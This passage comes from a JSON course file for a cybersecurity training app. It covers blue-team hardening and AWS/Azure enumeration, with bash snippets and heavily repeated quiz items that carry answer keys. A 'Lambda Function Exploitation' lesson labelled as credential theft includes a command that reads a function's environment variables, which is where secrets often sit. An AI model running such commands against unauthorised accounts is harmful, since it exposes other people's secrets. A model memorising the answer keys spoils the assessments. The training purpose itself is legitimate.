investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-endpoint-hardening","cat":"Defense & Blue Team","title":"Endpoint Hardening Checklist","diff":1,"xp":75,"intro":"Essential steps for securing workstations.","sections":[{"type":"text","content":"Essential steps for securing workstations."},{"type":"code","lang":"bash","content":"# 1. Full disk encryption (BitLocker/LUKS)\n# 2. Antivirus/EDR deployed\n# 3. Host firewall enabled\n# 4. Automatic updates\n# 5. Application whitelisting\n# 6. Disable unnecessary services\n# 7. Remove local admin rights"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"The most impactful endpoint hardening...","opts":["Disabling USB","Removing local admin rights (limits malware impact)","Changing wallpaper","Disabling Bluetooth"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-container-security","cat":"Defense & Blue Team","title":"Container Security Best Practices","diff":2,"xp":150,"intro":"Secure containers from build to runtime.","sections":[{"type":"text","content":"Secure containers from build to runtime."},{"type":"code","lang":"bash","content":"# Build: minimal base images, scan with trivy, no root\n# Deploy: read-only filesystem, drop capabilities, resource limits\n# Runtime: monitor syscalls, network policies, runtime protection\ntrivy image myapp:latest\ndocker run --read-only --cap-drop=ALL --user 1000 myapp"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Container security starts at...","opts":["Runtime only","Build time (scan images, use minimal bases, no root)","Deployment only","Never"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"cl-aws-iam-enum","cat":"Cloud & Container","title":"AWS IAM Enumeration","diff":2,"xp":150,"intro":"Discover IAM users, roles, policies, and permissions.","sections":[{"type":"text","content":"Discover IAM users, roles, policies, and permissions."},{"type":"code","lang":"bash","content":"aws iam list-users\naws iam list-roles\naws iam list-policies --scope Local\naws iam get-policy-version --policy-arn ARN --version-id v1"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"IAM enumeration reveals...","opts":["Network config","Users, roles, and their permissions","VPC settings","S3 contents"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-aws-ec2-enum","cat":"Cloud & Container","title":"EC2 Instance Enumeration","diff":2,"xp":150,"intro":"List and analyze EC2 instances.","sections":[{"type":"text","content":"List and analyze EC2 instances."},{"type":"code","lang":"bash","content":"aws ec2 describe-instances --query 'Reservations[*].Instances[*].[InstanceId,State.Name,PublicIpAddress]'\naws ec2 describe-security-groups"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"EC2 enumeration reveals...","opts":["User accounts","Running instances, IPs, and security groups","DNS records","Certificates"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-aws-lambda","cat":"Cloud & Container","title":"Lambda Function Exploitation","diff":3,"xp":200,"intro":"Exploit serverless functions for credential theft.","sections":[{"type":"text","content":"Exploit serverless functions for credential theft."},{"type":"code","lang":"bash","content":"aws lambda list-functions\naws lambda get-function-configuration --function-name func | jq '.Environment.Variables'\naws lambda invoke --function-name func output.txt"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Lambda secrets leak through...","opts":["Log files","Environment variables","S3 only","DynamoDB only"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-aws-rds","cat":"Cloud & Container","title":"RDS Database Security","diff":2,"xp":150,"intro":"Secure and exploit managed databases.","sections":[{"type":"text","content":"Secure and exploit managed databases."},{"type":"code","lang":"bash","content":"aws rds describe-db-instances\n# Check for public accessibility\naws rds describe-db-instances --query 'DBInstances[?PubliclyAccessible==`true`]'"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Public RDS instances are dangerous because...","opts":["They're slow","Anyone on the internet can attempt to connect","They lack backups","They're unencrypted"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-aws-kms","cat":"Cloud & Container","title":"AWS KMS Key Management","diff":2,"xp":150,"intro":"Manage encryption keys in AWS.","sections":[{"type":"text","content":"Manage encryption keys in AWS."},{"type":"code","lang":"bash","content":"aws kms list-keys\naws kms describe-key --key-id KEY_ID\naws kms encrypt --key-id KEY_ID --plaintext 'secret'\naws kms decrypt --ciphertext-blob fileb://encrypted"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"KMS provides...","opts":["Network encryption","Managed encryption key storage and operations","VPN access","IAM management"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-azure-enum","cat":"Cloud & Container","title":"Azure Resource Enumeration","diff":2,"xp":150,"intro":"Discover Azure subscriptions, resource groups, and resources.","sections":[{"type":"text","content":"Discover Azure subscriptions, resource groups, and resources."},{"type":"code","lang":"bash","content":"az account list\naz group list\naz resource list\naz vm list\naz webapp list"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Azure 'az resource list' shows...","opts":["Only VMs","All resources in the subscription","Network config","DNS only"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a 